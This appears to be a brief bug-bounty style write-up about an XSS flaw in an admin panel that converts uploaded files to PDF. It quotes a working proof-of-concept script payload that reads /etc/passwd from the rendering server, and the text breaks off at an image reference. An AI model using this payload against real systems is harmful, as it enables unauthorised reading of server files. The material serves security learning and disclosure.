Situation :  Admin Panel infected with xss and uploading any file converted to pdf.   P0c from (https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html): <script> x=new XMLHttpRequest; x.onload=function() { document.write(this.responseText) }; x.open("GET","file:///etc/passwd"); x.send(); </script>   Explaining it in images: Next Download…